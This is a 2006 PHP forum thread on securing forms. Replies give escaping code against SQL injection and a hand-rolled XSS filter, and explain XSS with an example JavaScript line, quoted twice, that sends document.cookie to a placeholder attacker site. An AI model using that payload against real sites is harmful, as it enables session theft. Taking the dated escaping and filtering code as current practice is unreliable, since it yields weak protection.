Jump to content


Photo

Security PHP & Forms


  • Please log in to reply
7 replies to this topic

#1 Mutley

Mutley
  • Members
  • PipPipPip
  • Advanced Member
  • 765 posts

Posted 09 October 2006 - 05:57 PM

Is there any tips you can give about securing PHP and forms? I think with forms it is possible at times to do SQL injections, how can you prevent this and stop abuse with forms?

Maybe restrict characters used, I would like to know how to secure the scripts I create.
~ Mutley.

#2 Daniel0

Daniel0
  • Staff Alumni
  • Advanced Member
  • 11,956 posts

Posted 09 October 2006 - 05:59 PM

mysql_real_escape_string would prevent SQL injection. Another thing you need to be vary about is XSS (cross-site scripting) attacks.

#3 Mutley

Mutley
  • Members
  • PipPipPip
  • Advanced Member
  • 765 posts

Posted 09 October 2006 - 06:19 PM

I just looked up mysql_real_escape_string in the PHP manual, so I can just use it among my variables within form fields. Looks easy and useful, I guess it disables certain characters or character combinations to be used.

Not heard of XSS, is it common?
~ Mutley.

#4 Orio

Orio
  • Staff Alumni
  • Advanced Member
  • 2,491 posts

Posted 09 October 2006 - 06:29 PM

I just looked up mysql_real_escape_string in the PHP manual, so I can just use it among my variables within form fields. Looks easy and useful, I guess it disables certain characters or character combinations to be used.



More or less yes :)
But you need to make sure that magic_quotes is turned off, because then the string will be escaped twice. And because mysql_real_escape_string() has a better effect compared to magic_quotes, it's important to use strip_slashes() before escaping (if magic_quotes is on).
I use this function to escape my strings:

<?php

function sql_quote($value) 
{ 

 if(get_magic_quotes_gpc())
   $value = stripslashes($value);

 if(function_exists("mysql_real_escape_string"))
   $value = mysql_real_escape_string($value); 
 else
   $value = addslashes($value);

 return $value;
}

?>

Orio.
Think you're smarty?

(Gone until 20 to November)

#5 Daniel0

Daniel0
  • Staff Alumni
  • Advanced Member
  • 11,956 posts

Posted 09 October 2006 - 06:34 PM

Not heard of XSS, is it common?


Yeah, It's beginning to get quite common, it works like this:
1. User gets redirected to hackers page. Could be like this (javascript):
location.href='http://evil-hackers-site.com/harvest_cookies.php?data='+document.cookie;
2. The page harvests the cookie information
3. The user is redirected back the original page.

Here are some information about XSS:
http://ha.ckers.org/xss.html
http://en.wikipedia...._site_scripting

#6 pedrobcabral

pedrobcabral
  • Members
  • PipPipPip
  • Advanced Member
  • 108 posts

Posted 09 October 2006 - 06:45 PM

Is that also prevented with the command spoken above?
If the website does not use cookies then it is inpossible to gether information from the user that goes toward the site, right?

Isn't the stripslashes enough?
Sorry if I got it wrong,

#7 Daniel0

Daniel0
  • Staff Alumni
  • Advanced Member
  • 11,956 posts

Posted 09 October 2006 - 06:49 PM

Is that also prevented with the command spoken above?


No. For that you would have to do something like this:
$t = html_entity_decode($t,ENT_QUOTES);
$t = str_replace("<","&#60;",$t);
$t = str_replace(">","&#62;",$t);
$t = str_replace("&quot;",htmlspecialchars('"'),$t);
$t = preg_replace("/&#0*([0-9]*);?/",'&#\\1;',$t);
$t = str_replace('&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;','javascript:',$t);
$t = preg_replace("/javascript:/i","nojava"/*&#97;v&#97;*/."script:",$t);
$t = preg_replace("/vbscript:/i","novb"/*&#98;*/."script:",$t);

More info on XSS prevention: http://blog.bitflux..../XSS_Prevention

#8 tomfmason

tomfmason
  • Staff Alumni
  • Advanced Member
  • 1,696 posts
  • Locationstealing your wifi

Posted 09 October 2006 - 06:55 PM

Not heard of XSS, is it common?


Yeah, It's beginning to get quite common, it works like this:
1. User gets redirected to hackers page. Could be like this (javascript):
location.href='http://evil-hackers-site.com/harvest_cookies.php?data='+document.cookie;
2. The page harvests the cookie information
3. The user is redirected back the original page.

Here are some information about XSS:
http://ha.ckers.org/xss.html
http://en.wikipedia...._site_scripting


Very nice Daniel0..

Here is a atricle from Developer Fusion on sql insertion.

Good luck,
Tom

Traveling East in search of instruction, and West to propagate the knowledge I have had gained.

current projects: pokersource

My Blog | My Pastebin | PHP Validation class | Backtrack linux





0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users